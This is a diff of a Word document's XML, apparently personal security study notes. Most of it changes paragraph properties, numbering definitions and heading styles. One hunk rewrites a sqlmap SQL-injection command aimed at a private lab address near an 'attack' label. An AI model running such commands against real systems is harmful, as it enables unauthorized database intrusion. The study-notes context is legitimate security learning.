@@ -27765,11 +27813,6 @@
             <w:tcW w:w="1413" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -27845,9 +27888,6 @@
           <w:p>
             <w:pPr>
               <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
@@ -27874,11 +27914,6 @@
             <w:tcW w:w="1413" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -27923,11 +27958,6 @@
             <w:tcW w:w="1413" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -27961,13 +27991,7 @@
         </w:tc>
       </w:tr>
     </w:tbl>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
@@ -28061,6 +28085,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>攻击：</w:t>
       </w:r>
     </w:p>
@@ -28323,11 +28348,7 @@
         <w:ind w:left="840"/>
       </w:pPr>
       <w:r>
-        <w:t>D:\security\sql injection\sqlmapproject-sqlmap-04c1d43&gt;sqlmap -u "http://172.17.50.231/stage/3df71a90c48ca5f4__3/17/action.php" --data act="sd" --</w:t>
-      </w:r>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>dbms mysql</w:t>
+        <w:t>D:\security\sql injection\sqlmapproject-sqlmap-04c1d43&gt;sqlmap -u "http://172.17.50.231/stage/3df71a90c48ca5f4__3/17/action.php" --data act="sd" --dbms mysql</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -28554,6 +28575,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="61"/>
+        </w:numPr>
       </w:pPr>
       <w:r>
         <w:t>Php</w:t>
@@ -28570,7 +28595,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="3"/>
+        <w:pStyle w:val="31"/>
         <w:numPr>
           <w:ilvl w:val="2"/>
           <w:numId w:val="14"/>
@@ -28641,7 +28666,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="3"/>
+        <w:pStyle w:val="31"/>
         <w:numPr>
           <w:ilvl w:val="2"/>
           <w:numId w:val="14"/>
@@ -28835,6 +28860,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>在</w:t>
       </w:r>
       <w:r>
@@ -29430,6 +29456,93 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="13235E2E"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="F10AC92C"/>
+    <w:lvl w:ilvl="0" w:tplc="925E92C6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="upperLetter"/>
+      <w:pStyle w:val="3"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1259" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1679" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2099" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2519" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2939" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3359" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3779" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4199" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4619" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="173207A5"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="03401438"/>
@@ -29542,7 +29655,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="1934257C"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="CD888100"/>
@@ -29628,7 +29741,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="22C76339"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="AB186A2A"/>
@@ -29717,7 +29830,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="27A6519F"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="EDE0450E"/>
@@ -29806,7 +29919,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2CAC7825"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="60F0583C"/>
@@ -29892,7 +30005,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="34427BD0"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="731EBE66"/>
@@ -29981,7 +30094,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="35DB5595"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="F20E9C24"/>
@@ -30067,7 +30180,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3874685D"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="E7C2855E"/>
@@ -30153,7 +30266,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3F2D5BDA"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="6DDE71A4"/>
@@ -30242,10 +30355,10 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="437D624A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="2A34540E"/>
+    <w:tmpl w:val="827EACDC"/>
     <w:lvl w:ilvl="0" w:tplc="F216EFF4">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
@@ -30259,7 +30372,6 @@
     <w:lvl w:ilvl="1" w:tplc="CEF04322">
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerLetter"/>
-      <w:pStyle w:val="3"/>
       <w:lvlText w:val="%2)"/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
@@ -30333,7 +30445,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4A765A37"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="662617A4"/>
@@ -30419,7 +30531,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4C6634AE"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="62BC4C5E"/>
@@ -30505,7 +30617,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4D847848"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="731EBE66"/>
@@ -30594,7 +30706,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4FF11784"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="19308F8C"/>
@@ -30683,7 +30795,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="539957E9"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="147ACC88"/>
@@ -30772,7 +30884,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="55486479"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="080AD106"/>
@@ -30858,7 +30970,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="575A5629"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="7510444E"/>
@@ -30947,7 +31059,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5CA16929"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="2280DE88"/>
@@ -31060,7 +31172,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="24" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5FE35CA2"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="3F1EDDC0"/>
@@ -31149,7 +31261,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="24" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="25" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="607C337B"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="71F67F54"/>
@@ -31235,7 +31347,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="25" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="26" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="68990C3B"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="6BB2EDDC"/>
@@ -31324,7 +31436,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="26" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="27" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6C861650"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="4EBE492C"/>
@@ -31410,7 +31522,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="27" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="28" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6CEF4BAE"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="29F87372"/>
@@ -31496,7 +31608,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="28" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="29" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6F863464"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="AD0ADC7A"/>
@@ -31582,7 +31694,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="29" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="30" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7D532399"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="731EBE66"/>
@@ -31672,167 +31784,273 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1">
-    <w:abstractNumId w:val="25"/>
+    <w:abstractNumId w:val="26"/>
   </w:num>
   <w:num w:numId="2">
-    <w:abstractNumId w:val="28"/>
+    <w:abstractNumId w:val="29"/>
   </w:num>
   <w:num w:numId="3">
-    <w:abstractNumId w:val="6"/>
+    <w:abstractNumId w:val="7"/>
   </w:num>
   <w:num w:numId="4">
     <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="5">
-    <w:abstractNumId w:val="20"/>
+    <w:abstractNumId w:val="21"/>
   </w:num>
   <w:num w:numId="6">
     <w:abstractNumId w:val="4"/>
   </w:num>
   <w:num w:numId="7">
-    <w:abstractNumId w:val="26"/>
+    <w:abstractNumId w:val="27"/>
   </w:num>
   <w:num w:numId="8">
-    <w:abstractNumId w:val="12"/>
+    <w:abstractNumId w:val="13"/>
   </w:num>
   <w:num w:numId="9">
-    <w:abstractNumId w:val="24"/>
+    <w:abstractNumId w:val="25"/>
   </w:num>
   <w:num w:numId="10">
-    <w:abstractNumId w:val="27"/>
+    <w:abstractNumId w:val="28"/>
   </w:num>
   <w:num w:numId="11">
-    <w:abstractNumId w:val="19"/>
+    <w:abstractNumId w:val="20"/>
   </w:num>
   <w:num w:numId="12">
-    <w:abstractNumId w:val="13"/>
+    <w:abstractNumId w:val="14"/>
   </w:num>
   <w:num w:numId="13">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="14">
-    <w:abstractNumId w:val="14"/>
+    <w:abstractNumId w:val="15"/>
   </w:num>
   <w:num w:numId="15">
+    <w:abstractNumId w:val="10"/>
+  </w:num>
+  <w:num w:numId="16">
     <w:abstractNumId w:val="9"/>
   </w:num>
-  <w:num w:numId="16">
+  <w:num w:numId="17">
+    <w:abstractNumId w:val="24"/>
+  </w:num>
+  <w:num w:numId="18">
+    <w:abstractNumId w:val="19"/>
+  </w:num>
+  <w:num w:numId="19">
     <w:abstractNumId w:val="8"/>
   </w:num>
-  <w:num w:numId="17">
-    <w:abstractNumId w:val="23"/>
-  </w:num>
-  <w:num w:numId="18">
-    <w:abstractNumId w:val="18"/>
-  </w:num>
-  <w:num w:numId="19">
-    <w:abstractNumId w:val="7"/>
-  </w:num>
   <w:num w:numId="20">
-    <w:abstractNumId w:val="21"/>
+    <w:abstractNumId w:val="22"/>
   </w:num>
   <w:num w:numId="21">
-    <w:abstractNumId w:val="14"/>
+    <w:abstractNumId w:val="15"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="22">
-    <w:abstractNumId w:val="14"/>
+    <w:abstractNumId w:val="15"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="23">
-    <w:abstractNumId w:val="14"/>
+    <w:abstractNumId w:val="15"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="24">
-    <w:abstractNumId w:val="15"/>
+    <w:abstractNumId w:val="16"/>
   </w:num>
   <w:num w:numId="25">
-    <w:abstractNumId w:val="11"/>
+    <w:abstractNumId w:val="12"/>
   </w:num>
   <w:num w:numId="26">
-    <w:abstractNumId w:val="14"/>
+    <w:abstractNumId w:val="15"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="27">
-    <w:abstractNumId w:val="10"/>
+    <w:abstractNumId w:val="11"/>
   </w:num>
   <w:num w:numId="28">
-    <w:abstractNumId w:val="29"/>
+    <w:abstractNumId w:val="30"/>
   </w:num>
   <w:num w:numId="29">
-    <w:abstractNumId w:val="17"/>
+    <w:abstractNumId w:val="18"/>
   </w:num>
   <w:num w:numId="30">
-    <w:abstractNumId w:val="14"/>
+    <w:abstractNumId w:val="15"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="31">
-    <w:abstractNumId w:val="14"/>
+    <w:abstractNumId w:val="15"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="32">
-    <w:abstractNumId w:val="14"/>
+    <w:abstractNumId w:val="15"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="33">
-    <w:abstractNumId w:val="14"/>
+    <w:abstractNumId w:val="15"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="34">
-    <w:abstractNumId w:val="14"/>
+    <w:abstractNumId w:val="15"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="35">
-    <w:abstractNumId w:val="22"/>
+    <w:abstractNumId w:val="23"/>
   </w:num>
   <w:num w:numId="36">
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="37">
-    <w:abstractNumId w:val="14"/>
+    <w:abstractNumId w:val="15"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="38">
-    <w:abstractNumId w:val="14"/>
-    <w:lvlOverride w:ilvl="0">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
+    <w:abstractNumId w:val="15"/>
   </w:num>
   <w:num w:numId="39">
-    <w:abstractNumId w:val="14"/>
+    <w:abstractNumId w:val="15"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="40">
-    <w:abstractNumId w:val="5"/>
+    <w:abstractNumId w:val="6"/>
   </w:num>
   <w:num w:numId="41">
     <w:abstractNumId w:val="2"/>
   </w:num>
   <w:num w:numId="42">
-    <w:abstractNumId w:val="16"/>
+    <w:abstractNumId w:val="17"/>
   </w:num>
+  <w:num w:numId="43">
+    <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="44">
+    <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="45">
+    <w:abstractNumId w:val="15"/>
+  </w:num>
+  <w:num w:numId="46">
+    <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="47">
+    <w:abstractNumId w:val="5"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+  </w:num>
+  <w:num w:numId="48">
+    <w:abstractNumId w:val="5"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+  </w:num>
+  <w:num w:numId="49">
+    <w:abstractNumId w:val="5"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+  </w:num>
+  <w:num w:numId="50">
+    <w:abstractNumId w:val="5"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+  </w:num>
+  <w:num w:numId="51">
+    <w:abstractNumId w:val="5"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+  </w:num>
+  <w:num w:numId="52">
+    <w:abstractNumId w:val="5"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+  </w:num>
+  <w:num w:numId="53">
+    <w:abstractNumId w:val="5"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+  </w:num>
+  <w:num w:numId="54">
+    <w:abstractNumId w:val="5"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+  </w:num>
+  <w:num w:numId="55">
+    <w:abstractNumId w:val="5"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+  </w:num>
+  <w:num w:numId="56">
+    <w:abstractNumId w:val="5"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+  </w:num>
+  <w:num w:numId="57">
+    <w:abstractNumId w:val="5"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+  </w:num>
+  <w:num w:numId="58">
+    <w:abstractNumId w:val="5"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+  </w:num>
+  <w:num w:numId="59">
+    <w:abstractNumId w:val="5"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+  </w:num>
+  <w:num w:numId="60">
+    <w:abstractNumId w:val="5"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+  </w:num>
+  <w:num w:numId="61">
+    <w:abstractNumId w:val="5"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+  </w:num>
+  <w:num w:numId="62">
+    <w:abstractNumId w:val="15"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+  </w:num>
+  <w:numIdMacAtCleanup w:val="62"/>
 </w:numbering>
 </file>
 
@@ -32448,33 +32666,34 @@
   <w:style w:type="paragraph" w:customStyle="1" w:styleId="10">
     <w:name w:val="笔记1级标题"/>
     <w:basedOn w:val="1"/>
-    <w:next w:val="a"/>
+    <w:next w:val="my"/>
     <w:link w:val="1Char0"/>
-    <w:autoRedefine/>
     <w:qFormat/>
-    <w:rsid w:val="000B29AF"/>
+    <w:rsid w:val="00812AAA"/>
     <w:pPr>
       <w:spacing w:before="160" w:after="160" w:line="480" w:lineRule="auto"/>
     </w:pPr>
     <w:rPr>
+      <w:bCs w:val="0"/>
       <w:sz w:val="28"/>
     </w:rPr>
   </w:style>
   <w:style w:type="paragraph" w:customStyle="1" w:styleId="2">
     <w:name w:val="笔记2级标题"/>
-    <w:basedOn w:val="20"/>
-    <w:next w:val="a"/>
+    <w:basedOn w:val="10"/>
+    <w:next w:val="my"/>
     <w:link w:val="2Char0"/>
-    <w:autoRedefine/>
     <w:qFormat/>
-    <w:rsid w:val="00BA22DE"/>
+    <w:rsid w:val="00CA0CA4"/>
     <w:pPr>
       <w:numPr>
-        <w:numId w:val="14"/>
+        <w:numId w:val="38"/>
       </w:numPr>
       <w:spacing w:before="80" w:after="80" w:line="360" w:lineRule="auto"/>
+      <w:outlineLvl w:val="1"/>
     </w:pPr>
     <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
       <w:sz w:val="21"/>
     </w:rPr>
   </w:style>
@@ -32496,16 +32715,16 @@
     <w:name w:val="笔记1级标题 Char"/>
     <w:basedOn w:val="1Char"/>
     <w:link w:val="10"/>
-    <w:rsid w:val="000B29AF"/>
+    <w:rsid w:val="00812AAA"/>
     <w:rPr>
       <w:b/>
-      <w:bCs/>
+      <w:bCs w:val="0"/>
       <w:kern w:val="44"/>
       <w:sz w:val="28"/>
       <w:szCs w:val="44"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="3">
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="31">
     <w:name w:val="笔记3级标题"/>
     <w:basedOn w:val="30"/>
     <w:next w:val="a"/>
@@ -32514,10 +32733,6 @@
     <w:qFormat/>
     <w:rsid w:val="006B12EC"/>
     <w:pPr>
-      <w:numPr>
-        <w:ilvl w:val="1"/>
-        <w:numId w:val="14"/>
-      </w:numPr>
       <w:spacing w:before="40" w:after="0" w:line="240" w:lineRule="auto"/>
     </w:pPr>
     <w:rPr>
@@ -32544,13 +32759,14 @@
     <w:name w:val="笔记2级标题 Char"/>
     <w:basedOn w:val="2Char"/>
     <w:link w:val="2"/>
-    <w:rsid w:val="00BA22DE"/>
+    <w:rsid w:val="00CA0CA4"/>
     <w:rPr>
       <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
       <w:b/>
-      <w:bCs/>
+      <w:bCs w:val="0"/>
+      <w:kern w:val="44"/>
       <w:sz w:val="32"/>
-      <w:szCs w:val="32"/>
+      <w:szCs w:val="44"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="3Char">
@@ -32570,7 +32786,7 @@
   <w:style w:type="character" w:customStyle="1" w:styleId="3Char0">
     <w:name w:val="笔记3级标题 Char"/>
